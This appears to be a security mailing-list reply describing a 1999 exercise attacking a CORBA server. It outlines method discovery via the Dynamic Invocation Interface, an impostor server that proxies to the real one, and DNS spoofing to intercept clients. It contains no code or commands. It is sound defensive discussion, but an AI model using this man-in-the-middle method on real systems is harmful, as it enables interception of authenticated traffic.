Re: middleware corba vulnerabilities:do they exist?

william fitzgerald wrote:
...
> I have been researching corba and corba security as a hobbie recently. Corba

   I conducted some attacks on a CORBA server system in an exercise in 1999 (so the data is old), but I don't believe the basic problem has been fixed. The "application" involved serving outside clients with large files and the ability to view them from the CORBA server. The outside clients were served through a stateful, proxying firewall using SSL. Inside clients were able to edit the large files. Both clients had an additional security step wherein they identified themselves via pre-shared SSL keys to the CORBA server to access the large file viewing/editing methods.

   I used Dynamic Invocation Interface (which was not protected) to determine the methods served by the CORBA server. This discovery function is available in one form or another in all middleware (Java RMI, DCOM, CORBA) and a major help to an attacker. I wrote IDL to match the methods, compiled that into a new set of methods and then wrote a new CORBA server application of my own that duplicated the interfaces. My server simply used the same methods to access the real server. From there it was a simple DNS spoof to step in between a client and the real CORBA server.

   Middleware weaknesses lie in the need to advertise, find, broker, and trade services as well as the fact that they depend upon the network infrastructure to be trustworthy. In addition, CORBA applications written in C or C++ are subject to standard coding error vulnerabilities. Another thing to look for in a middleware implementation is any sort of remote program invocation. This can be done very insecurely.

-- 
Ray Parks                   rcparks@sandia.gov
IDART Project Lead          Voice:505-844-4024
IORTA Department            Fax:505-844-9641
http://www.sandia.gov/idart Pager:800-690-5288